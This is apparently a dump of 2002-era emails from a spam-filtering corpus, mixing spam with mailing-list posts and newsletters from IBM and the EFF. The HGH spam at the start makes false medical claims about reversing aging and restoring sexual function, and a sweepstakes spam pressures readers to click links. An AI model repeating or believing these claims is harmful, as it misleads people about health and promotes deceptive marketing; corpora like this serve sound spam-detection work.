         &lt;/font&gt;&lt;/b&gt;&lt;font face=3D"Arial" size=3D"3" color=3D"#FFFFFF"&gt;
         &lt;br&gt;
         Remarkable discoveries about Human Growth Hormones (&lt;b&gt;HGH&lt;/b&gt;) &lt;b=
 r&gt;
         are changing the way we think about aging and weight loss.&lt;/font&gt;&lt;=
 /p&gt;
           &lt;center&gt;
           &lt;table width=3D"442" bgcolor=3D"#FFFFFF"&gt;
             &lt;tr&gt;
               &lt;td height=3D"2" width=3D"200"&gt;
                 &lt;p align=3D"left"&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-=
 serif" size=3D"3" color=3D"#000000"&gt;&amp;#8226;&amp;nbsp;Lose Weight&lt;br&gt;
                 &amp;#8226;&amp;nbsp;Build Muscle Tone&lt;br&gt;
                 &amp;#8226;&amp;nbsp;Reverse Aging&lt;br&gt;
                 &amp;#8226;&amp;nbsp;Increased Libido&lt;br&gt;
                 &amp;#8226;&amp;nbsp;Duration Of Penile&lt;br&gt;
                 &amp;nbsp;&amp;nbsp;Erection&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
               &lt;/td&gt;
               &lt;td height=3D"2" width=3D"200"&gt;
                 &lt;p align=3D"left"&gt;&lt;b&gt;&lt;font color=3D"#000000"&gt;&lt;font face=3D=
 "Arial, Helvetica, sans-serif" size=3D"3"&gt;&amp;#8226;&amp;nbsp;Healthier Bones&lt;br&gt;
                 &amp;#8226;&amp;nbsp;Improved Memory&lt;br&gt;
                 &amp;#8226;&amp;nbsp;Improved skin&lt;br&gt;
                 &amp;#8226;&amp;nbsp;New Hair Growth&lt;br&gt;
                 &amp;#8226;&amp;nbsp;Wrinkle&lt;br&gt;
                 &amp;nbsp;&amp;nbsp;Disappearance
                 &lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
               &lt;/td&gt;
             &lt;/table&gt;
           &lt;/center&gt;
           &lt;p align=3D"center"&gt;&lt;a href=3D"http://65.127.181.173/hgh/"&gt;&lt;font=
  face=3D"Arial" color=3D"#FFFFFF" size=3D"4"&gt;&lt;b&gt;Visit
           Our Web Site and Learn The Facts: Click Here&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
           &lt;p&gt;&amp;nbsp;&lt;font size=3D"-3" color=3D"#0000ff"&gt;vvnx11&lt;/font&gt;&lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/div&gt;
 We are strongly against sending unsolicited emails to those who do not wis=
 h to receive our special mailings. You have opted in to one or more of our=
  affiliate sites requesting to be notified of any special offers. We have =
 retained the services of an independent 3rd party to manage list managemen=
 t and removal services. If you do not wish to receive further mailings, pl=
 ease click below to be removed from the list. Please accept our apologies =
 if you have been sent this email in error. We honor all removal requests.
 &lt;p align=3D"center"&gt;&lt;b&gt;&lt;font size=3D"3" face=3D"Arial"&gt;&lt;br&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;a href=3D"http://65.127.181.173/remove.htm"&gt;&lt;big&gt;&lt;fon=
 t face=3D"Arial"&gt;To unsubscribe click here&lt;/font&gt;&lt;/big&gt;&lt;/a&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 av8r5  98984w 0sd9f89085
 --9EE6957817154900AA7494F2E1F329BE
 Content-Type: text/plain
 Content-Disposition: inline
 ______________________________________________________________________
 This messsage was sent using the trial version of the 
 1st Class Mail Server software.  You can try it for free
 at http://www.1cis.com/download/1cismail.asp
 Is this unsolicited email?  Instructions for reporting unsolicited
 email can be found at at http://www.1cis.com/articles/spam.asp
 --9EE6957817154900AA7494F2E1F329BE--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your approval is needed
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ************************************************
                  $25,000 CASH GIVEAWAY!
 ************************************************
 Dear jm@netnoteinc.com,
 You're receiving this email because you are registered
 in the BESTCHEAPSTUFF.COM www.bestcheapstuff.com
 customer base. If you would prefer not to receive our mailings, 
 please click on the Unsubscribe link below.
 Subscribe to our newsletter by clicking the confirmation
 link: http://www.bestcheapstuff.com/cgi-bin/confirm_sub.cgi?name=yyyy@netnoteinc.com                 
 and you will receive the latest information on SPECIAL DEALS, FREE 
 VACATION GIVEAWAYS, FREE PRODUCTS, and 
 other valuable Promotions from BestCheapStuff.com !
 Along with your subscription, you will be automatically
 entered into our CASH SWEEPSTAKES for $25,000 
 in June 2002.
 CLICK here http://www.bestcheapstuff.com/cgi-bin/confirm_sub.cgi?name=jm@netnoteinc.com            
 to confirm your subscription and to ENTER our 
 CASH GIVEAWAY for June 2002.
 **By Not taking any of the above actions you will be deleted from our
 mailing list within 30 days.**
 Thank you for your cooperation.
 ************************************************
 If you prefer not to enter our sweepstakes or get the latest
 news on FREE GIVEAWAYS, please click here: 
 http://www.bestcheapstuff.com/cgi-bin/unsub.cgi?name=jm@netnoteinc.com                 
 We will promptly remove your email from our mailing list.
</t>
  </si>
  <si>
    <t xml:space="preserve">unwritten rule.  8-)
 gg
 -----Original Message-----
 From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of CDale
 Sent: Friday, September 06, 2002 10:21 PM
 To: Geege Schuman
 Cc: bitbitch@magnesium.net; Adam L. Beberg; fork@example.com
 Subject: RE: Re[2]: Selling Wedded Bliss (was Re: Ouch...)
 Why should I?  (:
 C
 On Fri, 6 Sep 2002, Geege Schuman wrote:
 &gt; quitcherbraggin.
 &gt;
 &gt; :-)
 &gt; gg
 &gt;
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of CDale
 &gt; Sent: Friday, September 06, 2002 3:42 AM
 &gt; To: bitbitch@magnesium.net
 &gt; Cc: Adam L. Beberg; fork@example.com
 &gt; Subject: Re[2]: Selling Wedded Bliss (was Re: Ouch...)
 &gt;
 &gt;
 &gt; I dunno, BB.  Women who like to be thought of this way should have the
 &gt; right to choose to be treated this way.  Men too...  ahem.  (:  My boy
 &gt; cleans, washes clothes, cooks, fixes stuff, etc, and works the same number
 &gt; of hours I do, sometimes more, if he has to catch up with me.  (:  I
 &gt; close him because he is industrious and creative, and because he
 &gt; unfailingly makes my bed the minute I get out of it.  And boy #2 will be
 &gt; here soon to help boy #1 with other things such as pedicures,  backrubs,
 &gt; and sure, fucking.  LOL! (along with the aforementioned "chores") Adam can
 &gt; have his cake and eat it too, if he can only find the right girl who has
 &gt; the same beliefs about gender  roles that he has. Of course, he has NO
 &gt; clue where to look, so we will be constantly laughing at him while he
 &gt; stumbles around in the dark.
 &gt; Cindy
 &gt; P.S. the numbers do not in any way indicate importance or favor -- only
 &gt; the order in which they move into my house.  -smiles at chris-
 &gt; P.S. #2.  I'm moving.   Going to New Orleans.  Can't handle any more cab
 &gt; driving.  The summer sucked here on the MS Gulf Coast, instead of rocking
 &gt; like it normally does.  Wish me luck.  I'm going to look for another
 &gt; computer job.  Le Sigh.  (:
 &gt;
 &gt; On Thu, 5 Sep 2002 bitbitch@magnesium.net wrote:
 &gt;
 &gt; &gt; Hello Adam,
 &gt; &gt;
 &gt; &gt; Thursday, September 05, 2002, 11:33:18 PM, you wrote:
 &gt; &gt;
 &gt; &gt;
 &gt; &gt; ALB&gt; So, you're saying that product bundling works? Good point.
 &gt; &gt;
 &gt; &gt; Sometimes I wish I was still in CA.  You deserve a good beating every
 &gt; &gt; so often...  (anyone else want to do the honors?)
 &gt; &gt;
 &gt; &gt; ALB&gt; And how is this any different from "normal" marriage exactly? Other
 &gt; then
 &gt; &gt; ALB&gt; that the woman not only gets a man, but one in a country where both
 &gt; she and
 &gt; &gt; ALB&gt; her offspring will have actual opportunities? Oh and the lack of
 &gt; &gt; ALB&gt; "de-feminized, over-sized, self-centered, mercenary-minded"
 choices?
 &gt; &gt;
 &gt; &gt; Mmkay.  For the nth time Adam, we don't live in the land of
 &gt; &gt; Adam-fantasy.  Women actually are allowed to do things productive,
 &gt; &gt; independent and entirely free of their male counterparts.  They aren't
 &gt; &gt; forced to cook and clean and merely be sexual vessels.   Sometimes,
 &gt; &gt; and this will come as a shock to you, no doubt, men and women even
 &gt; &gt; find -love- (which is the crucial distinction between this system) and
 &gt; &gt; they marry one another for the satisfaction of being together.   I
 &gt; &gt; know, far-fetched and idealistically crazy as it is, but such things
 &gt; &gt; do happen.   I can guarantee you, if my mother was approached by my
 &gt; &gt; father, and 25 years ago, he commented on her cleaning ability as a
 &gt; &gt; motivator for marrying her, we would not be having this conversation
 &gt; &gt; now.
 &gt; &gt;
 &gt; &gt; If guys still have silly antequated ideas about 'women's role' then
 &gt; &gt; their opportunities for finding women _will_ be scarce.   Again, these
 &gt; &gt; situations are great, provided everyone is aware that the relationship
 &gt; &gt; is a contractual one -- he wants a maid, a dog and a prostitute he
 &gt; &gt; doesn't have to pay, and she wants a country that isn't impoverished
 &gt; &gt; and teeming with AIDS.  A contract, versus a true love-interest
 &gt; &gt; marriage.
 &gt; &gt;
 &gt; &gt; Egh.  I really need to stop analyzing your posts to this extent.   I
 &gt; &gt; blame law school and my cat.
 &gt; &gt;
 &gt; &gt; -BB
 &gt; &gt;
 &gt; &gt; ALB&gt; - Adam L. "Duncan" Beberg
 &gt; &gt; ALB&gt;   http://www.mithral.com/~beberg/
 &gt; &gt; ALB&gt;   beberg@mithral.com
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt;
 &gt; --
 &gt; "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
 &gt;
 &gt;
 &gt;
 &gt;
 &gt;
 --
 "I don't take no stocks in mathematics, anyway" --Huckleberry Finn
</t>
  </si>
  <si>
    <t xml:space="preserve">Lance (lance_tt@bellsouth.net) wrote*:
 &gt;
 &gt;I really liked Ximian (back then, Helix ?) at first but, to me, Red
 &gt;Hat's GNOME, released with 7.3 seems much more pretty and up-to-date.
 &gt;Could this be because of inclusion of gtk2 in RH 7.3?
 Not many apps actually use gtk2 yet. If they do, it's obvious because it is a
 different tool kit. With gnomehide, I ported a lot of gtk1.2 themes to gtk2,
 because they are rarely compatible. Those themes are on dudex.net/rpms/ but it
 does not matter unless you have gnome2.
 In gnomehide, the apps that actually use gtk2 are Nautilus, gedit, some of the
 "utility" apps, like dictionary, calcultor, the settings applets, and of
 course the gnome panels and menus.
 --
 That's "angle" as in geometry.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: IBM eNews: Aktuelle Informationen von IBM
</t>
  </si>
  <si>
    <t xml:space="preserve">IBM eNews
 4. Juli 2002
 Liebe Leserin, lieber Leser,
 zur Zeit findet in Wimbledon das diesjhrige Tennisturnier 
 statt - mit Hilfe von IBM auch online unter 
 http://www.wimbledon.org ein packendes Ereignis. 
 Lesen Sie mehr ber diesem Internetauftritt und zu 
 zahlreichen weiteren Themen aus der IT-Branche in der 
 aktuellen Ausgabe von IBM eNews.
 Nutzen Sie die Mglichkeit, auf folgender Webseite aus ber 
 40 Interessensgebieten die Themen fr Ihre persnliche 
 IBM eNews Ausgabe auszuwhlen. Sie erhalten dann Business-
 Informationen nach Ma:
 http://www.ibm.com/de/profile/change_interests.html
 Alle Artikel knnen Sie jederzeit online auf dieser Webseite 
 aufrufen:
 http://www.ibm.com/de/news/enews/online/
 Wir halten Sie auf dem Laufenden
 IBM eNews
 Wenn Sie in Zukunft IBM eNews nicht mehr erhalten mchten, 
 knnen Sie sich auf dieser Webseite abmelden:
 http://www.ibm.com/de/profile/unsubscribe.html
 In der heutigen Ausgabe:
 ========================
 e-business
   o  Wimbledon gewinnt: Mit Hilfe von IBM auch online ein packendes Ereignis 
      http://isource.ibm.com/cgi-bin/goto?on=de020756
   o  Neues Buch "Deutschland Online" weist Weg in die
       Informationsgesellschaft 
      http://isource.ibm.com/cgi-bin/goto?on=de020757
   o  Weitere Artikel aus dem Bereich "e-business" 
      http://isource.ibm.com/cgi-bin/goto?on=020758
 Business Lsungen und Services
   o  Mehr Training fr alle: IBM Learning Services Corporate Card 
      http://isource.ibm.com/cgi-bin/goto?on=020721
   o  Weitere Artikel aus dem Bereich "Business Lsungen und Services"  
      http://isource.ibm.com/cgi-bin/goto?on=020759
 IT Solutions und Services
   o  e-guide aktuell: Produkte und Lsungen fr den Mittelstand -
       zusammengefasst im IBM Kundenmagazin! 
      http://isource.ibm.com/cgi-bin/goto?on=020710
   o  Sprechen Sie mit uns: Sicherheit ist Trumpf 
      http://isource.ibm.com/cgi-bin/goto?on=020712
   o  Weitere Artikel aus dem Bereich "IT Solutions und Services" 
      http://isource.ibm.com/cgi-bin/goto?on=020760
 Software
   o  Software fr den Mittelstand 
      http://isource.ibm.com/cgi-bin/goto?on=020711
   o  WebSphere Integration 
      http://isource.ibm.com/cgi-bin/goto?on=020724
   o  Weitere Artikel aus dem Bereich "Software"  
      http://isource.ibm.com/cgi-bin/goto?on=020761
 Hardware
   o  Neu: IBM ThinkPad A31p - Die erste mobile 3D-Workstation! 
      http://isource.ibm.com/cgi-bin/goto?on=de020707
   o  IBM eServer* pSeries 630 6E4/6C4 - Ankndigung des neuen Entry Servers 
      http://isource.ibm.com/cgi-bin/goto?on=020713
   o  Weitere Artikel aus dem Bereich "Hardware" 
      http://isource.ibm.com/cgi-bin/goto?on=020762
 ------------------------------------------------------------
 e-business
 ------------------------------------------------------------
 Wimbledon gewinnt: Mit Hilfe von IBM auch online ein packendes Ereignis 
    Die neue Turnier-Website bietet Tennisfans in aller Welt 
   sekundenaktuelle Spielstnde, Live-Videos, Kommentare und 
   Interviews. Mit e-business on demand lsst sich dabei die 
   erforderliche Kapazitt fr den Ansturm whrend des Turniers 
   einfach einschalten - und anschlieend ebenso einfach wieder 
   abschalten. Ein echter Service-Gewinn, Klick fr Klick. 
   http://isource.ibm.com/cgi-bin/goto?on=de020756
 Neues Buch "Deutschland Online" weist Weg in die
       Informationsgesellschaft 
   "Die schnelle Transformation in die Informationsgesellschaft ist 
   Deutschlands letzte Chance, um im Kreis der groen 
   Wirtschaftsmchte zu verbleiben. Deutschland muss IT-Weltmacht 
   werden - und das pronto!" Das verlangte der Vorsitzende der 
   Geschftsfhrung der IBM Deutschland, Erwin Staudt, anlsslich 
   der Vorstellung des Buches "Deutschland online" - Strategien und 
   Projekte fr die Informationsgesellschaft - in Berlin.
    http://isource.ibm.com/cgi-bin/goto?on=de020757
 Weitere Artikel aus dem Bereich "e-business" 
   Weitere Artikel aus dem Bereich "e-business" finden Sie online
   auf unserer IBM eNews Website:
   http://isource.ibm.com/cgi-bin/goto?on=020758
   Unter folgender Adresse knnen Sie Ihre Interessensgebiete 
   auswhlen und erhalten dann Business-Informationen nach Ma:
   http://www-5.ibm.com/de/profile/change_interests.html
 ------------------------------------------------------------
 Business Lsungen und Services
 ------------------------------------------------------------
 Mehr Training fr alle: IBM Learning Services Corporate Card 
   IBM Learning Services bietet Ihnen preisgnstige Trainings: Mit 
   der IBM Learning Services Corporate Card sparen Sie bis zu 1.650 
   Euro. Im Unterschied zur IBM Learning Services Education Card 
   knnen Sie damit alle Ihre Mitarbeiter/innen zu den Trainings 
   senden.
   http://isource.ibm.com/cgi-bin/goto?on=020721
 Weitere Artikel aus dem Bereich "Business Lsungen und Services"  
   Weitere Artikel aus dem Bereich "Business Lsungen und Services" 
   finden Sie online auf unserer IBM eNews Website:
   http://isource.ibm.com/cgi-bin/goto?on=020759
   Unter folgender Adresse knnen Sie Ihre Interessensgebiete 
   auswhlen und erhalten dann Business-Informationen nach Ma:
   http://www-5.ibm.com/de/profile/change_interests.html
 ------------------------------------------------------------
 IT Solutions und Services
 ------------------------------------------------------------
 e-guide aktuell: Produkte und Lsungen fr den Mittelstand -
       zusammengefasst im IBM Kundenmagazin! 
   Mit dieser Ausgabe bernehmen wir Teile des Heftes auch im Web. 
   Lesen Sie hier mehr ber den neuen Produkt- und Lsungsteil 
   oder bestellen Sie sich Ihr Exemplar des IBM Kundenmagazins 
   "e-guide" 2/2002.
   http://isource.ibm.com/cgi-bin/goto?on=020710
 Sprechen Sie mit uns: Sicherheit ist Trumpf 
   Sie machen sich sicherlich Gedanken darber, ob Ihre e-business 
   Infrastruktur wirkungsvoll geschtzt ist - insbesondere vor dem 
   Hintergrund sich ffnender Strukturen.
   IBM - als einer der Vorreiter im Bereich e-business Sicherheits-
   strategien - bietet Ihnen Lsungen, mit denen Sie Ihre 
   IT-Infrastruktur sichern knnen. berzeugen Sie sich selbst:
   http://isource.ibm.com/cgi-bin/goto?on=020712
 Weitere Artikel aus dem Bereich "IT Solutions und Services" 
   Weitere Artikel aus dem Bereich "IT Solutions und Services" 
   finden Sie online auf unserer IBM eNews Website:
   http://isource.ibm.com/cgi-bin/goto?on=020760
   Unter folgender Adresse knnen Sie Ihre Interessensgebiete 
   auswhlen und erhalten dann Business-Informationen nach Ma:
   http://www-5.ibm.com/de/profile/change_interests.html
 ------------------------------------------------------------
 Software
 ------------------------------------------------------------
 Software fr den Mittelstand 
   Hier finden Sie ausgewhlte Software-Produkte mit Beispielen 
   unserer zufriedenen Kunden. Die IBM Produktfamilien WebSphere, 
   DB2, Lotus und Tivoli sind die Basis fr eine Vielfalt von 
   e-business Lsungen. Sie sind industrie-spezifisch, skalierbar 
   ausgerichtet und basieren auf offenen Standards, so dass sie 
   speziell auf die Bedrfnisse des Mittelstandes zugeschnitten 
   werden knnen.
   http://isource.ibm.com/cgi-bin/goto?on=020711
 WebSphere Integration 
   Mit WebSphere Integration versucht die IBM keine Technologie zu 
   vermarkten, die die unberschaubare Vielfalt der Individual-
   programmierungen um neue Facetten bereichert. Vielmehr agiert 
   sie wie ein Katalysator und ermglicht die Erweiterung und 
   Erneuerung von Systemlandschaften sowie die Migration von 
   geschftskritischen Daten. Mehr dazu im Software-Schwerpunkt 
   des Monats.
   http://isource.ibm.com/cgi-bin/goto?on=020724
 Weitere Artikel aus dem Bereich "Software"  
   Weitere Artikel aus dem Bereich "Software" finden Sie online
   auf unserer IBM eNews Website:
   http://isource.ibm.com/cgi-bin/goto?on=020761
   Unter folgender Adresse knnen Sie Ihre Interessensgebiete 
   auswhlen und erhalten dann Business-Informationen nach Ma:
   http://www-5.ibm.com/de/profile/change_interests.html
 ------------------------------------------------------------
 Hardware
 ------------------------------------------------------------
 Neu: IBM ThinkPad A31p - Die erste mobile 3D-Workstation! 
   Der ThinkPad A31p (TV2N6GE, TV2L3GE, TV2N5GE) ist ausgerstet mit 
   einem Intel Pentium 4 Notebookprozessor-M, schnellen DDR Speicher-
   modulen und einem extrem leistungsfhigen Grafikchip. Auch die 
   Highspeed Festplatte lsst keine Wnsche offen. Zwei modulare 
   Laufwerkschchte sorgen fr ein Plus an Flexibilitt. Das Notebook 
   ist mit einer 10/100 Ethernet-Karte, einem 56K V.92 Modem, 
   integrierten 802.11b Wireless-Antennen/-Chip, Bluetooth sowie 
   einem IEEE 1394 (Firewire)-Anschluss ausgerstet. 
   http://isource.ibm.com/cgi-bin/goto?on=de020707
 IBM eServer* pSeries 630 6E4/6C4 - Ankndigung des neuen Entry Servers 
   IBM definiert den UNIX Entry Server neu. Zuverlssigkeit und
   Verfgbarkeit der POWER4-Prozessortechnologie jetzt vom Entry- 
   bis zum Enterprise-Bereich, mit Selbstverwaltungsfunktionen aus 
   dem Projekt eLiza, ultraflaches Rack- oder Deskside-Modell, die 
   richtige Wahl fr kleine und mittelstndische Unternehmen.
   http://isource.ibm.com/cgi-bin/goto?on=020713
 Weitere Artikel aus dem Bereich "Hardware" 
   Weitere Artikel aus dem Bereich "Hardware" finden Sie online
   auf unserer IBM eNews Website:
   http://isource.ibm.com/cgi-bin/goto?on=020762
   Unter folgender Adresse knnen Sie Ihre Interessensgebiete 
   auswhlen und erhalten dann Business-Informationen nach Ma:
   http://www-5.ibm.com/de/profile/change_interests.html
 ============================================================
 Sie erhalten diese E-Mail, da Sie zu IBM eNews
   angemeldet sind als XXXXXX.YYYYYYYYYY@RUHR-UNI-BOCHUM.DE
 *Das IBM eServer Warenzeichen besteht aus dem eingefhrten 
 IBM e-business Logo, gefolgt von dem beschreibenden Begriff 
 "Server".
 Nach unseren Kundendaten sind Sie an Informationsmaterial von 
 IBM interessiert. An- und Abmelden sowie Ihre Einstellungen 
 ndern knnen Sie auf folgender Website: 
 http://www.ibm.com/de/profile/
 Kontakt: webmaster@de.ibm.com
 Copyright (c) 2002  IBM Deutschland
</t>
  </si>
  <si>
    <t xml:space="preserve">And you were exactly the person I figured would do so. &lt;G&gt;
 On Thu, 5 Sep 2002, Theo Van Dinter wrote:
 &gt; On Thu, Sep 05, 2002 at 06:16:57PM -0500, Mike Burger wrote:
 &gt; &gt; You might be better asking this on the spamassassin-talk list.  The folks 
 &gt; &gt; there will almost definitely have an answer for this.
 &gt; 
 &gt; I posted a fairly lengthy complete answer to this problem and how to
 &gt; get around it in SA 2.41 on the spamassassin-talk list. :)
 &gt; 
 &gt;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</si>
  <si>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EFFector Online Newsletter
 EFFector      Vol. 15, No. 28      September 11, 2002      ren@eff.org
 A Publication of the Electronic Frontier Foundation     ISSN 1062-9424
 In the 227th Issue of EFFector:
     * Motions Filed in Morpheus Peer-to-Peer Case
     * EFF's Second Annual Share-In This Weekend!
     * Help With Our Internet Blocking in Schools Project
     * Deep Links
     * Administrivia
 For more information on EFF activities &amp; alerts: http://www.eff.org/
 To join EFF or make an additional donation:
   http://www.eff.org/support/
 EFF is a member-supported nonprofit. Please sign up as a member today!
 *Motions Filed in Morpheus Peer-to-Peer Case
 Judge to Consider Legality of Gnutella Software
 Los Angeles - Attorneys for StreamCast Networks, developers of the
 popular Morpheus peer-to-peer (P2P) file sharing software, filed
 briefs in federal court on Monday seeking a ruling that distribution
 of the software does not violate copyright law.
 Morpheus is a popular file-sharing application based on the
 decentralized Gnutella P2P networking protocol.
 In their briefs seeking summary judgment, attorneys from the
 Electronic Frontier Foundation (EFF) and the law firm of Brobeck,
 Phleger and Harrison argued that distribution of the software is legal
 because the product is capable of substantial noninfringing uses and
 because StreamCast cannot control the various uses of the software.
 Supporting StreamCast in the motion is nine time Grammy nominee Janis
 Ian, who believes that peer-to-peer software represents important new
 opportunities for artists.
 On October 2, 2001, 28 of the world's largest entertainment companies
 sued StreamCast for the allegedly infringing actions of users of its
 product (MGM et al v. Grokster et al, Case No. 01-CV-8541 SVW).
 Additional briefs will be filed in the months to come, with oral
 arguments set for December 2, 2002, before U.S. Federal District Court
 Judge Stephen Wilson in Los Angeles.
 Links:
 For this release:
 http://www.eff.org/IP/P2P/MGM_v_Grokster/20020909_eff_pr.html
 Documents related to Metro-Goldwyn Mayer v. Grokster case:
 http://www.eff.org/IP/P2P/MGM_v_Grokster/
 Janis Ian's "Internet Debacle" article:
 http://www.janisian.com/article-internet_debacle.html
 - end -
 *Electronic Frontier Foundation Holds Second Annual Share-In
 John Perry Barlow, Mountain Girl Garcia Host Free Music Fest
 San Francisco - Join the Electronic Frontier Foundation and five Bay
 Area bands for an afternoon of live music and outdoor fun at EFF's
 second annual Share-In. The festival will be held in Golden Gate
 Park's Music Concourse Bandshell on Saturday, September 14th from noon
 - 5pm. The celebration of independent music will be hosted by Grateful
 Dead lyricist and EFF co-founder John Perry Barlow and former wife of
 the late great Jerry Garcia, Mountain Girl Garcia.
 Artists participating in this event will permit recording of their
 performances by those in attendance in support of EFFs Open Audio
 License (OAL). Musicians performing at the event include: the Box Set
 Duo - clown princes of folk-rock, the classic funk band Funkmonsters,
 celtic world-fusion group Hy Brassyl, harmony based folk-pop band
 Atticus Scout, and Berkeley-based party band Shady Lady.
 In addition to music, the Share-In will feature performers including
 Ashley Foster the One Wheeled Wonder, the Existential Circus,
 Frantastic Hands, the Metronome Dancers, and Willy Bologna and his
 Sideshow Circus. Bring your family and friends!
 Ben and Jerry's will sell their famous ice cream, and Cartwheel
 Catering will be on site with hot dogs, pretzels, and churros.
 Proceeds from the Share-In will go directly to EFF's Campaign for
 Audiovisual Free Expression (CAFE), which oversees projects such as
 the Open Audio License. CAFE empowers the creative community in
 cyberspace by protecting the public's access to and use of audiovisual
 technologies.
 The Open Audio License is a tool that EFF has developed in order to
 help artists share music more directly with their fans, without
 sacrificing recognition for their creativity. The OAL encourages
 collaboration, providing artists with an alternative to a business
 model strictly driven by profit. Based on the open source and free
 software initiatives for software development, the OAL encourages
 artists to share with one another and their fans
 Adoption of the OAL does not mean that artists go unrewarded for their
 work. On the contrary, the OAL permits artists to share single tracks
 or performances and gain widespread recognition for their work without
 relying on intermediaries. EFF encourages new models of music
 distribution in the digital world that benefit the artists themselves.
 The Internet makes it possible to drastically reduce the overhead for
 packaging and distributing music, which is where record companies
 currently spend most of the money that could be going to artists. EFF
 is committed to developing tools that empower artists to take control
 over their own art and to be compensated appropriately for their works.
 When: Saturday, September 14th, Noon-5pm
 Where: Music Concourse Bandshell in Golden Gate Park, near the
 Japanese Tea Gardens between MLK Drive and JFK Drive
 More Information and Travel Directions:
 http://www.eff.org/events/share-in/
 Links:
 EFF's Cafe Project:
 http://www.eff.org/cafe/
 The Open Audio License:
 http://www.eff.org/IP/Open_licenses/eff_oal.html
 - end -
 *Help With Our Internet Blocking in Schools Study
 If you know of any public school students, teachers, school
 administrators, school board members, parents, or recent public school
 alumni in the United States who are willing to speak about the impact
 of Internet blocking on educational opportunities, the EFF would like
 to make contact with them. We are especially looking for people in or
 near the following areas:
     * Asheville, NC
     * Boston, MA
     * Nashville, TN
     * New York City
     * San Francisco, CA
 Please have them contact:
 Will Doherty
 wild@eff.org
 - end -
 *Deep Links
 Deep Links features noteworthy news items, victories, and threats from
 around the Internet.
 Community Wireless Allows People to Break Away from Czech Telekom
 Another wireless community helps bring access to rural areas and those
 who otherwise would not have access. See the story at:
 http://www.pbj.cz/user/article.asp?ArticleID=158576
 - end -
 Google Blocked in China
 A populat search engine is blocked in China and internet traffic is
 constantly being monitored. Read about it at:
 http://news.bbc.co.uk/2/hi/technology/2231101.stm
 - end -
 iPod Clone Spoiled by DRM
 Second generation USB speed rendered useless by DRM encryption used in
 Toshiba's Mobilphile:
 http://www.zdnet.com/products/stories/reviews/0,4161,2877898,00.html
 - end -
 The Netizen in 2002
 What does it mean to be a Netizen today? Contribute to the call for
 submissions found at:
 http://www.well.com/~doctorow/netizen.txt
 - end -
 *Administrivia
 EFFector is published by:
 The Electronic Frontier Foundation
 454 Shotwell Street
 San Francisco CA 94110-1914 USA
 +1 415 436 9333 (voice)
 +1 415 436 9993 (fax)
   http://www.eff.org/
 Editor:
 Ren Bucholz, Activist
   ren@eff.org
 To Join EFF online, or make an additional donation, go to:
   http://www.eff.org/support/
 Membership &amp; donation queries: membership@eff.org
 General EFF, legal, policy or online resources queries: ask@eff.org
 Reproduction of this publication in electronic media is encouraged.
 Signed articles do not necessarily represent the views of EFF. To
 reproduce signed articles individually, please contact the authors for
 their express permission. Press releases and EFF announcements &amp;
 articles may be reproduced individually at will.
 To change your address, please visit http://action.eff.org/subscribe/.
 &gt;&gt;From there, you can update all your information. If you have already
 subscribed to the EFF Action Center, please visit
 http://action.eff.org/action/login.asp.
 To unsubscribe from the EFFector mailing list, send an email to
 alerts@action.eff.org with the word "Remove" in the subject.
 (Please ask ren@eff.org to manually remove you from the list if this
 does not work for you for some reason.)
 Back issues are available at:
   http://www.eff.org/effector
 To get the latest issue, go to:
   http://www.eff.org/effector/current.html
 ++++++++++++++++++++++++
 You received this message because qqqqqqqqqqs-eff@example.com is a member of
 the mailing list originating from alerts@action.eff.org. To unsubscribe 
 from all mailing lists originating from alerts@action.eff.org, send an 
 email from qqqqqqqqqqs-eff@example.com to alerts@action.eff.org with 'Remove' as the
 only text in the subject line.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wednesday 02 October 2002 06:37 pm, Tom wrote: 
 &gt; But what actually happened in Jaguar was that Apple added code to
 &gt; exclude all non-Apple menu extras.
 Too, too, too, true.  Just you try to muck with Job's blessed Aqua 
 interface.   Or remove the fscking dock.  OSX is such a step down from 
 Classic with Kaleidoscope skinning the entire UI.  As an artist, I resent 
 it deeply.   (This is not in praise of Classic.)  If my environment cannot 
 be made beautiful, in some sense I cannot live.
 Eirikur
</t>
  </si>
  <si>
    <t xml:space="preserve">Congratulations!!
 A few observations:
 All children are different and will generally route around whatever 
 technique you learned from relatives, books, talk shows, or the last child.
 Just when you get good at being a parent, you're done.
 Don't overprotect. I always called this "First Baby Syndrome". A 
 neighbor at one point had a 4 or 5 year old that would choke on jello, 
 probably because she never allowed him to have solid food until he was 
 far too old, IMHO. I fed mine cereal, etc., early and let them get the 
 hang of it. I always want my kids to be able to handle anything if I'm 
 not there so I have them try it out when I am. (Within limits of 
 course.) Of course, I'm now beating up my body at Vans Skate Park trying 
 to do 5ft. half pipes on speed skates with my 10 year old daughter.
 sdw
 Gary Lawrence Murphy wrote:
 &gt;&gt;&gt;&gt;&gt;&gt;"t" == tomwhore  &lt;Tom&gt; writes:
 &gt;&gt;&gt;&gt;&gt;&gt;            
 &gt;&gt;&gt;&gt;&gt;&gt;
 &gt;
 &gt;    t&gt; The first pewp...man they prep you for it but northing really
 &gt;    t&gt; can...Wowzer that stuff is road tar.
 &gt;
 &gt;First kid, eh? ;)
 &gt;
 &gt;No, there's no prep for it.  No prep for the fifth either.  If you have
 &gt;any parenting guidance books, burn them now.
 &gt;
 &gt;Congratulations; kudos and regards to the mum.  It don't matter how it
 &gt;happened so long as everyone's ok.
 &gt;
 &gt;Starting today, that's three lives that will never be the same.
 &gt;
